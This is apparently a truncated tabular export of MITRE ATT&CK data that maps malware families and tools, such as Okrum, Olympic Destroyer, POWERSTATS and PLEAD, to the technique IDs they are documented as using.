S0402 OSX/Shlayemalware--fsoftware uses T1176 Browser Exattack-pat technique [OSX/Shlaye
S0402 OSX/Shlayemalware--fsoftware uses T1140 Deobfuscatattack-pat technique [OSX/Shlay
S0402 OSX/Shlayemalware--fsoftware uses T1548.004Elevated E attack-pat technique [OSX/Shlaye
S0402 OSX/Shlayemalware--fsoftware uses T1083 File and Di attack-pat technique [OSX/Shlay
S0402 OSX/Shlayemalware--fsoftware uses T1553.001Gatekeeperattack-pat technique If running
S0402 OSX/Shlayemalware--fsoftware uses T1564.001Hidden Fileattack-pat technique [OSX/Shlay
S0402 OSX/Shlayemalware--fsoftware uses T1564 Hide Artifaattack-pat technique [OSX/Shlay
S0402 OSX/Shlayemalware--fsoftware uses T1564.011Ignore Procattack-pat technique [OSX/Shlay
S0402 OSX/Shlayemalware--fsoftware uses T1105 Ingress Tooattack-pat technique [OSX/Shlaye
S0402 OSX/Shlayemalware--fsoftware uses T1222.002Linux and M attack-pat technique [OSX/Shlay
S0402 OSX/Shlayemalware--fsoftware uses T1204.002Malicious Fattack-pat technique [OSX/Shlaye
S0402 OSX/Shlayemalware--fsoftware uses T1036.005Match Legiattack-pat technique [OSX/Shlaye
S0402 OSX/Shlayemalware--fsoftware uses T1564.009Resource Fattack-pat technique [OSX/Shlaye
S0402 OSX/Shlayemalware--fsoftware uses T1082 System Inf attack-pat technique [OSX/Shlaye
S0402 OSX/Shlayemalware--fsoftware uses T1059.004Unix Shell attack-pat technique [OSX/Shlaye
S0352 OSX_OCEAmalware--bsoftware uses T1560.003Archive vi attack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1560.002Archive viaattack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1005 Data from attack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1140 Deobfuscatattack-pat technique [OSX_OCEANL
S0352 OSX_OCEAmalware--bsoftware uses T1027.013Encrypted/attack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1070.004File Deleti attack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1553.001Gatekeeperattack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1564.001Hidden Fileattack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1105 Ingress Tooattack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1543.001Launch Ageattack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1543.004Launch Da attack-pat technique If running
S0352 OSX_OCEAmalware--bsoftware uses T1222.002Linux and M attack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1036.008Masquerade attack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1036.004Masquerade attack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1095 Non-Applicattack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1571 Non-Standaattack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1059.001PowerShellattack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1129 Shared Moattack-pat technique For network
S0352 OSX_OCEAmalware--bsoftware uses T1027.002Software Pattack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1132.001Standard Eattack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1573.001Symmetric attack-pat technique [OSX_OCEANL
S0352 OSX_OCEAmalware--bsoftware uses T1497.001System Cheattack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1082 System Inf attack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1016 System Netattack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1070.006Timestompattack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1059.004Unix Shell attack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1059.005Visual Basiattack-pat technique [OSX_OCEAN
S0352 OSX_OCEAmalware--bsoftware uses T1071.001Web Protocattack-pat technique [OSX_OCEAN
S0644 ObliqueRAmalware-- software uses T1030 Data Transfattack-pat technique [ObliqueRAT
S0644 ObliqueRAmalware-- software uses T1025 Data from attack-pat technique [ObliqueRAT
S0644 ObliqueRAmalware-- software uses T1083 File and Di attack-pat technique [ObliqueRAT
S0644 ObliqueRAmalware-- software uses T1074.001Local Data attack-pat technique [ObliqueRAT
S0644 ObliqueRAmalware-- software uses T1204.001Malicious Lattack-pat technique [ObliqueRAT
S0644 ObliqueRAmalware-- software uses T1120 Peripheral attack-pat technique [ObliqueRAT
S0644 ObliqueRAmalware-- software uses T1057 Process Di attack-pat technique [ObliqueRA
S0644 ObliqueRAmalware-- software uses T1547.001Registry Ruattack-pat technique [ObliqueRAT
[ObliqueRAT](https://attack.m
S0644 ObliqueRAmalware-- software uses T1113 Screen Capattack-pat technique
S0644 ObliqueRAmalware-- software uses T1027.003Steganogr attack-pat technique [ObliqueRA
S0644 ObliqueRAmalware-- software uses T1497.001System Cheattack-pat technique [ObliqueRAT
S0644 ObliqueRAmalware-- software uses T1082 System Inf attack-pat technique [ObliqueRAT
S0644 ObliqueRAmalware-- software uses T1033 System Own attack-pat technique [ObliqueRAT
S0644 ObliqueRAmalware-- software uses T1125 Video Captattack-pat technique [ObliqueRA
S0346 OceanSalt malware--2software uses T1070.004File Deleti attack-pat technique [OceanSalt]
S0346 OceanSalt malware--2software uses T1083 File and Di attack-pat technique [OceanSalt]
S0346 OceanSalt malware--2software uses T1132.002Non-Standaattack-pat technique [OceanSalt]
S0346 OceanSalt malware--2software uses T1057 Process Di attack-pat technique [OceanSalt]
S0346 OceanSalt malware--2software uses T1566.001Spearphishattack-pat technique [OceanSalt]
S0346 OceanSalt malware--2software uses T1082 System Inf attack-pat technique [OceanSalt
S0346 OceanSalt malware--2software uses T1016 System Netattack-pat technique [OceanSalt]
S0346 OceanSalt malware--2software uses T1059.003Windows Cattack-pat technique [OceanSalt]
S0340 Octopus malware-- software uses T1560.001Archive viaattack-pat technique [Octopus](h
S0340 Octopus malware-- software uses T1005 Data from attack-pat technique [Octopus](h
S0340 Octopus malware-- software uses T1041 Exfiltratio attack-pat technique [Octopus](h
S0340 Octopus malware-- software uses T1567.002Exfiltratio attack-pat technique [Octopus](h
S0340 Octopus malware-- software uses T1083 File and Di attack-pat technique [Octopus](h
S0340 Octopus malware-- software uses T1105 Ingress Tooattack-pat technique [Octopus](h
S0340 Octopus malware-- software uses T1074.001Local Data attack-pat technique [Octopus](h
S0340 Octopus malware-- software uses T1204.002Malicious Fattack-pat technique [Octopus](h
S0340 Octopus malware-- software uses T1036.005Match Legiattack-pat technique [Octopus](
S0340 Octopus malware-- software uses T1547.001Registry Ruattack-pat technique [Octopus](
S0340 Octopus malware-- software uses T1113 Screen Capattack-pat technique [Octopus](h
S0340 Octopus malware-- software uses T1566.001Spearphishattack-pat technique [Octopus](
S0340 Octopus malware-- software uses T1132.001Standard Eattack-pat technique [Octopus](
S0340 Octopus malware-- software uses T1082 System Inf attack-pat technique [Octopus](h
S0340 Octopus malware-- software uses T1016 System Netattack-pat technique [Octopus](h
S0340 Octopus malware-- software uses T1033 System Own attack-pat technique [Octopus](h
S0340 Octopus malware-- software uses T1071.001Web Protocattack-pat technique [Octopus](
S0340 Octopus malware-- software uses T1047 Windows M attack-pat technique [Octopus](h
S0439 Okrum malware-- software uses T1560.003Archive vi attack-pat technique [Okrum](ht
S0439 Okrum malware-- software uses T1560.001Archive viaattack-pat technique [Okrum](ht
S0439 Okrum malware-- software uses T1003.005Cached Dom attack-pat technique [Okrum](ht
S0439 Okrum malware-- software uses T1001 Data Obfusattack-pat technique Okrum leve
S0439 Okrum malware-- software uses T1140 Deobfuscatattack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1041 Exfiltratio attack-pat technique Data exfilt
S0439 Okrum malware-- software uses T1090.002External Prattack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1070.004File Deleti attack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1083 File and Di attack-pat technique [Okrum](ht
S0439 Okrum malware-- software uses T1564.001Hidden Fileattack-pat technique Before exfi
S0439 Okrum malware-- software uses T1105 Ingress Tooattack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1056.001Keyloggingattack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1003.001LSASS Memattack-pat technique [Okrum](ht
S0439 Okrum malware-- software uses T1036.004Masquerade attack-pat technique [Okrum](ht
S0439 Okrum malware-- software uses T1001.003Protocol o attack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1547.001Registry Ruattack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1053.005Scheduled attack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1569.002Service Ex attack-pat technique [Okrum](ht
S0439 Okrum malware-- software uses T1547.009Shortcut Mattack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1132.001Standard Eattack-pat technique [Okrum](ht
S0439 Okrum malware-- software uses T1027.003Steganogr attack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1573.001Symmetric attack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1497.001System Cheattack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1082 System Inf attack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1016 System Netattack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1049 System Netattack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1033 System Own attack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1124 System Timattack-pat technique [Okrum](ht
S0439 Okrum malware-- software uses T1497.003Time Basedattack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1134.001Token Impeattack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1497.002User Activiattack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1071.001Web Protocattack-pat technique [Okrum](ht
S0439 Okrum malware-- software uses T1059.003Windows Cattack-pat technique [Okrum](htt
S0439 Okrum malware-- software uses T1543.003Windows Se attack-pat technique To establis
S0365 Olympic Demalware-- software uses T1070.001Clear Windattack-pat technique [Olympic De
S0365 Olympic Demalware-- software uses T1555.003Credential attack-pat technique [Olympic De
S0365 Olympic Demalware-- software uses T1485 Data Destrattack-pat technique [Olympic De
S0365 Olympic Demalware-- software uses T1490 Inhibit Sy attack-pat technique [Olympic D
S0365 Olympic Demalware-- software uses T1003.001LSASS Memattack-pat technique [Olympic De
S0365 Olympic Demalware-- software uses T1570 Lateral Tooattack-pat technique [Olympic De
S0365 Olympic Demalware-- software uses T1135 Network Shattack-pat technique [Olympic De
S0365 Olympic Demalware-- software uses T1018 Remote Sysattack-pat technique [Olympic D
S0365 Olympic Demalware-- software uses T1021.002SMB/Windo attack-pat technique [Olympic D
S0365 Olympic Demalware-- software uses T1569.002Service Ex attack-pat technique [Olympic De
S0365 Olympic Demalware-- software uses T1489 Service Stoattack-pat technique [Olympic De
S0365 Olympic Demalware-- software uses T1016 System Netattack-pat technique [Olympic De
S0365 Olympic Demalware-- software uses T1529 System Sh attack-pat technique [Olympic De
S0365 Olympic Demalware-- software uses T1047 Windows M attack-pat technique [Olympic De
S0052 OnionDukemalware-- software uses T1140 Deobfuscatattack-pat technique [OnionDuke]
S0052 OnionDukemalware-- software uses T1499 Endpoint De attack-pat technique [OnionDuke]
S0052 OnionDukemalware-- software uses T1003 OS Credentattack-pat technique [OnionDuke]
S0052 OnionDukemalware-- software uses T1102.003One-Way Cattack-pat technique [OnionDuke]
S0052 OnionDukemalware-- software uses T1071.001Web Protocattack-pat technique [OnionDuke
S0264 OopsIE malware-- software uses T1560.003Archive vi attack-pat technique [OopsIE](ht
S0264 OopsIE malware-- software uses T1560.001Archive viaattack-pat technique [OopsIE](ht
S0264 OopsIE malware-- software uses T1030 Data Transfattack-pat technique [OopsIE](ht
S0264 OopsIE malware-- software uses T1140 Deobfuscatattack-pat technique [OopsIE](h
S0264 OopsIE malware-- software uses T1041 Exfiltratio attack-pat technique [OopsIE](ht
S0264 OopsIE malware-- software uses T1070.004File Deleti attack-pat technique [OopsIE](ht
S0264 OopsIE malware-- software uses T1105 Ingress Tooattack-pat technique [OopsIE](ht
S0264 OopsIE malware-- software uses T1074.001Local Data attack-pat technique [OopsIE](ht
S0264 OopsIE malware-- software uses T1027 Obfuscatedattack-pat technique [OopsIE](ht
S0264 OopsIE malware-- software uses T1053.005Scheduled attack-pat technique [OopsIE](ht
S0264 OopsIE malware-- software uses T1027.002Software Pattack-pat technique [OopsIE](h
S0264 OopsIE malware-- software uses T1132.001Standard Eattack-pat technique [OopsIE](ht
S0264 OopsIE malware-- software uses T1497.001System Cheattack-pat technique [OopsIE](h
S0264 OopsIE malware-- software uses T1082 System Inf attack-pat technique [OopsIE](ht
S0264 OopsIE malware-- software uses T1124 System Timattack-pat technique [OopsIE](ht
S0264 OopsIE malware-- software uses T1059.005Visual Basiattack-pat technique [OopsIE](ht
S0264 OopsIE malware-- software uses T1071.001Web Protocattack-pat technique [OopsIE](ht
S0264 OopsIE malware-- software uses T1059.003Windows Cattack-pat technique [OopsIE](h
S0264 OopsIE malware-- software uses T1047 Windows M attack-pat technique [OopsIE](ht
S0229 Orz malware-- software uses T1102.002Bidirectio attack-pat technique [Orz](http
S0229 Orz malware-- software uses T1083 File and Di attack-pat technique [Orz](https
S0229 Orz malware-- software uses T1070 Indicator attack-pat technique [Orz](https
S0229 Orz malware-- software uses T1105 Ingress Tooattack-pat technique [Orz](https
S0229 Orz malware-- software uses T1112 Modify Regattack-pat technique [Orz](https
S0229 Orz malware-- software uses T1027 Obfuscatedattack-pat technique Some [Orz]
S0229 Orz malware-- software uses T1057 Process Di attack-pat technique [Orz](https
S0229 Orz malware-- software uses T1055.012Process Hoattack-pat technique Some [Orz]
S0229 Orz malware-- software uses T1218.010Regsvr32 attack-pat technique Some [Orz]
S0229 Orz malware-- software uses T1518 Software Dattack-pat technique [Orz](https
S0229 Orz malware-- software uses T1082 System Inf attack-pat technique [Orz](https
S0229 Orz malware-- software uses T1016 System Netattack-pat technique [Orz](https
S0229 Orz malware-- software uses T1059.003Windows Cattack-pat technique [Orz](https
S0594 Out1 tool--80c8 software uses T1005 Data from attack-pat technique [Out1](htt
S0594 Out1 tool--80c8 software uses T1114.001Local Emailattack-pat technique [Out1](htt
S0594 Out1 tool--80c8 software uses T1027 Obfuscatedattack-pat technique [Out1](htt
S0594 Out1 tool--80c8 software uses T1071.001Web Protocattack-pat technique [Out1](htt
S0594 Out1 tool--80c8 software uses T1059.003Windows Cattack-pat technique [Out1](htt
S1017 OutSteel malware--csoftware uses T1059.010AutoHotKey attack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1119 Automatedattack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1020 Automatedattack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1005 Data from attack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1041 Exfiltratio attack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1070.004File Deleti attack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1083 File and Di attack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1105 Ingress Tooattack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1570 Lateral Tooattack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1204.002Malicious Fattack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1204.001Malicious Lattack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1036.005Match Legiattack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1057 Process Di attack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1566.001Spearphishattack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1566.002Spearphishattack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1071.001Web Protocattack-pat technique [OutSteel](
S1017 OutSteel malware--csoftware uses T1059.003Windows Cattack-pat technique [OutSteel](
S0072 OwaAuth malware--asoftware uses T1560.003Archive vi attack-pat technique [OwaAuth](h
S0072 OwaAuth malware--asoftware uses T1083 File and Di attack-pat technique [OwaAuth](h
S0072 OwaAuth malware--asoftware uses T1505.004IIS Componattack-pat technique [OwaAuth](h
S0072 OwaAuth malware--asoftware uses T1056.001Keyloggingattack-pat technique [OwaAuth](h
S0072 OwaAuth malware--asoftware uses T1036.005Match Legiattack-pat technique [OwaAuth](
S0072 OwaAuth malware--asoftware uses T1070.006Timestompattack-pat technique [OwaAuth](h
S0072 OwaAuth malware--asoftware uses T1071.001Web Protocattack-pat technique [OwaAuth](
S0072 OwaAuth malware--asoftware uses T1505.003Web Shell attack-pat technique [OwaAuth](h
S0598 P.A.S. Webmalware-- software uses T1059 Command attack-pat
an technique [P.A.S. Web
S0598 P.A.S. Webmalware-- software uses T1213 Data from attack-pat technique [P.A.S. Web
S0598 P.A.S. Webmalware-- software uses T1005 Data from attack-pat technique [P.A.S. Web
S0598 P.A.S. Webmalware-- software uses T1140 Deobfuscatattack-pat technique [P.A.S. We
S0598 P.A.S. Webmalware-- software uses T1070.004File Deleti attack-pat technique [P.A.S. Web
S0598 P.A.S. Webmalware-- software uses T1083 File and Di attack-pat technique [P.A.S. Web
S0598 P.A.S. Webmalware-- software uses T1105 Ingress Tooattack-pat technique [P.A.S. We
S0598 P.A.S. Webmalware-- software uses T1222.002Linux and M attack-pat technique [P.A.S. Web
S0598 P.A.S. Webmalware-- software uses T1087.001Local Acco attack-pat technique [P.A.S. We
S0598 P.A.S. Webmalware-- software uses T1046 Network Seattack-pat technique [P.A.S. Web
S0598 P.A.S. Webmalware-- software uses T1027 Obfuscatedattack-pat technique [P.A.S. Web
S0598 P.A.S. Webmalware-- software uses T1110.001Password Gattack-pat technique [P.A.S. We
S0598 P.A.S. Webmalware-- software uses T1518 Software Dattack-pat technique [P.A.S. Web
S0598 P.A.S. Webmalware-- software uses T1071.001Web Protocattack-pat technique [P.A.S. We
S0598 P.A.S. Webmalware-- software uses T1505.003Web Shell attack-pat technique [P.A.S. We
S0016 P2P ZeuS malware-- software uses T1001.001Junk Data attack-pat technique [P2P ZeuS](
S0626 P8RAT malware-- software uses T1105 Ingress Tooattack-pat technique [P8RAT](htt
S0626 P8RAT malware-- software uses T1001.001Junk Data attack-pat technique [P8RAT](ht
S0626 P8RAT malware-- software uses T1057 Process Di attack-pat technique [P8RAT](htt
S0626 P8RAT malware-- software uses T1497.001System Cheattack-pat technique [P8RAT](ht
S0626 P8RAT malware-- software uses T1497.003Time Basedattack-pat technique [P8RAT](htt
S1109 PACEMAKEmalware-- software uses T1119 Automatedattack-pat technique [PACEMAKER]
S1109 PACEMAKEmalware-- software uses T1083 File and Di attack-pat technique [PACEMAKER
S1109 PACEMAKEmalware-- software uses T1074.001Local Data attack-pat technique [PACEMAKER
S1109 PACEMAKEmalware-- software uses T1003.007Proc Files attack-pat technique [PACEMAKER
S1109 PACEMAKEmalware-- software uses T1055.008Ptrace Systattack-pat technique [PACEMAKER
S1109 PACEMAKEmalware-- software uses T1059.004Unix Shell attack-pat technique [PACEMAKER]
S0158 PHOREAL malware--fsoftware uses T1112 Modify Regattack-pat technique [PHOREAL](h
S0158 PHOREAL malware--fsoftware uses T1095 Non-Applicattack-pat technique [PHOREAL](
S0158 PHOREAL malware--fsoftware uses T1059.003Windows Cattack-pat technique [PHOREAL](h
S1123 PITSTOP malware-- software uses T1573.002Asymmetricattack-pat technique [PITSTOP](h
S1123 PITSTOP malware-- software uses T1140 Deobfuscatattack-pat technique [PITSTOP](
S1123 PITSTOP malware-- software uses T1559 Inter-Proc attack-pat technique [PITSTOP](h
S1123 PITSTOP malware-- software uses T1205.002Socket Filt attack-pat technique [PITSTOP](
S1123 PITSTOP malware-- software uses T1059.004Unix Shell attack-pat technique [PITSTOP](h
S0254 PLAINTEE malware--2software uses T1548.002Bypass Useattack-pat technique An older va
S0254 PLAINTEE malware--2software uses T1105 Ingress Tooattack-pat technique [PLAINTEE]
S0254 PLAINTEE malware--2software uses T1112 Modify Regattack-pat technique [PLAINTEE](
S0254 PLAINTEE malware--2software uses T1057 Process Di attack-pat technique [PLAINTEE]
S0254 PLAINTEE malware--2software uses T1547.001Registry Ruattack-pat technique [PLAINTEE]
S0254 PLAINTEE malware--2software uses T1573.001Symmetric attack-pat technique [PLAINTEE]
S0254 PLAINTEE malware--2software uses T1082 System Inf attack-pat technique [PLAINTEE]
S0254 PLAINTEE malware--2software uses T1016 System Netattack-pat technique [PLAINTEE](
S0254 PLAINTEE malware--2software uses T1059.003Windows Cattack-pat technique [PLAINTEE]
S0435 PLEAD malware-- software uses T1010 Applicatio attack-pat technique [PLEAD](ht
S0435 PLEAD malware-- software uses T1555 Credential attack-pat technique [PLEAD](htt
S0435 PLEAD malware-- software uses T1555.003Credential attack-pat technique [PLEAD](htt
S0435 PLEAD malware-- software uses T1070.004File Deleti attack-pat technique [PLEAD](htt
S0435 PLEAD malware-- software uses T1083 File and Di attack-pat technique [PLEAD](htt
S0435 PLEAD malware-- software uses T1105 Ingress Tooattack-pat technique [PLEAD](htt
S0435 PLEAD malware-- software uses T1001.001Junk Data attack-pat technique [PLEAD](ht
S0435 PLEAD malware-- software uses T1204.002Malicious Fattack-pat technique [PLEAD](ht
S0435 PLEAD malware-- software uses T1204.001Malicious Lattack-pat technique [PLEAD](htt
S0435 PLEAD malware-- software uses T1106 Native API attack-pat technique [PLEAD](htt
S0435 PLEAD malware-- software uses T1057 Process Di attack-pat technique [PLEAD](htt
S0435 PLEAD malware-- software uses T1090 Proxy attack-pat technique [PLEAD](ht
S0435 PLEAD malware-- software uses T1573.001Symmetric attack-pat technique [PLEAD](ht
S0435 PLEAD malware-- software uses T1071.001Web Protocattack-pat technique [PLEAD](ht
S0435 PLEAD malware-- software uses T1059.003Windows Cattack-pat technique [PLEAD](ht
S0216 POORAIM malware-- software uses T1102.002Bidirectio attack-pat technique [POORAIM](
S0216 POORAIM malware-- software uses T1189 Drive-by C attack-pat technique [POORAIM](
S0216 POORAIM malware-- software uses T1083 File and Di attack-pat technique [POORAIM](
S0216 POORAIM malware-- software uses T1057 Process Di attack-pat technique [POORAIM](
S0216 POORAIM malware-- software uses T1113 Screen Capattack-pat technique [POORAIM](
S0216 POORAIM malware-- software uses T1082 System Inf attack-pat technique [POORAIM](h
S0150 POSHSPY malware-- software uses T1573.002Asymmetricattack-pat technique [POSHSPY](h
S0150 POSHSPY malware-- software uses T1030 Data Transfattack-pat technique [POSHSPY](
S0150 POSHSPY malware-- software uses T1568.002Domain Gen attack-pat technique [POSHSPY](
S0150 POSHSPY malware-- software uses T1105 Ingress Tooattack-pat technique [POSHSPY](
S0150 POSHSPY malware-- software uses T1027 Obfuscatedattack-pat technique [POSHSPY](h
S0150 POSHSPY malware-- software uses T1059.001PowerShellattack-pat technique [POSHSPY](
S0150 POSHSPY malware-- software uses T1070.006Timestompattack-pat technique [POSHSPY](h
S0150 POSHSPY malware-- software uses T1546.003Windows Ma attack-pat technique [POSHSPY](h
S0145 POWERSOUmalware-- software uses T1071.004DNS attack-pat technique [POWERSOUR
S0145 POWERSOUmalware-- software uses T1105 Ingress Tooattack-pat technique [POWERSOUR
S0145 POWERSOUmalware-- software uses T1564.004NTFS File Aattack-pat technique If the vic
S0145 POWERSOUmalware-- software uses T1059.001PowerShellattack-pat technique [POWERSOUR
S0145 POWERSOUmalware-- software uses T1012 Query Regiattack-pat technique [POWERSOUR
S0145 POWERSOUmalware-- software uses T1547.001Registry Ruattack-pat technique [POWERSOUR
S0223 POWERSTAmalware-- software uses T1573.002Asymmetricattack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1027.001Binary Padattack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1027.010Command aOttack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1559.001Componentattack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1005 Data from attack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1140 Deobfuscatattack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1562.001Disable or attack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1559.002Dynamic Daattack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1090.002External Prattack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1070.004File Deleti attack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1105 Ingress Tooattack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1059.007JavaScript attack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1087.001Local Acco attack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1036.004Masquerade attack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1218.005Mshta attack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1059.001PowerShellattack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1057 Process Di attack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1053.005Scheduled attack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1029 Scheduled attack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1113 Screen Capattack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1518.001Security S attack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1132.001Standard Eattack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1082 System Inf attack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1016 System Netattack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1033 System Own attack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1059.005Visual Basiattack-pat technique [POWERSTAT
S0223 POWERSTAmalware-- software uses T1047 Windows M attack-pat technique [POWERSTAT
S0371 POWERTO malware-- software uses T1059.001PowerShellattack-pat technique [POWERTON](
S0371 POWERTO malware-- software uses T1547.001Registry Ruattack-pat technique [POWERTON](
S0371 POWERTO malware-- software uses T1003.002Security A attack-pat technique [POWERTON]
S0371 POWERTO malware-- software uses T1573.001Symmetric attack-pat technique [POWERTON](
S0371 POWERTO malware-- software uses T1071.001Web Protocattack-pat technique [POWERTON]
S0371 POWERTO malware-- software uses T1546.003Windows Ma attack-pat technique [POWERTON]
S0184 POWRUNEmalware-- software uses T1071.004DNS attack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1087.002Domain Acattack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1069.002Domain Grattack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1083 File and Di attack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1105 Ingress Tooattack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1069.001Local Grouattack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1059.001PowerShellattack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1057 Process Di attack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1012 Query Regiattack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1053.005Scheduled attack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1113 Screen Capattack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1518.001Security S attack-pat technique [POWRUNER](
S0184 POWRUNEmalware-- software uses T1132.001Standard Eattack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1082 System Inf attack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1016 System Netattack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1049 System Netattack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1033 System Own attack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1071.001Web Protocattack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1059.003Windows Cattack-pat technique [POWRUNER]
S0184 POWRUNEmalware-- software uses T1047 Windows M attack-pat technique [POWRUNER]
S0613 PS1 malware-- software uses T1140 Deobfuscatattack-pat technique [PS1](https
S0613 PS1 malware-- software uses T1055.001Dynamic-linattack-pat technique [PS1](https
S0613 PS1 malware-- software uses T1027.013Encrypted/attack-pat technique [PS1](https
S0613 PS1 malware-- software uses T1105 Ingress Tooattack-pat technique [CostaBric
S0613 PS1 malware-- software uses T1059.001PowerShellattack-pat technique [PS1](https
S1108 PULSECHE malware--9software uses T1132.001Standard Eattack-pat technique [PULSECHEC
S1108 PULSECHE malware--9software uses T1059.004Unix Shell attack-pat technique [PULSECHEC
S1108 PULSECHE malware--9software uses T1071.001Web Protocattack-pat technique [PULSECHECK
S1108 PULSECHE malware--9software uses T1505.003Web Shell attack-pat technique [PULSECHEC
S0196 PUNCHBUGmalware-- software uses T1546.009AppCert DLattack-pat technique [PUNCHBUGG
S0196 PUNCHBUGmalware-- software uses T1560.001Archive viaattack-pat technique [PUNCHBUGGY
S0196 PUNCHBUGmalware-- software uses T1140 Deobfuscatattack-pat technique [PUNCHBUGG
S0196 PUNCHBUGmalware-- software uses T1070.004File Deleti attack-pat technique [PUNCHBUGG
S0196 PUNCHBUGmalware-- software uses T1105 Ingress Tooattack-pat technique [PUNCHBUGG
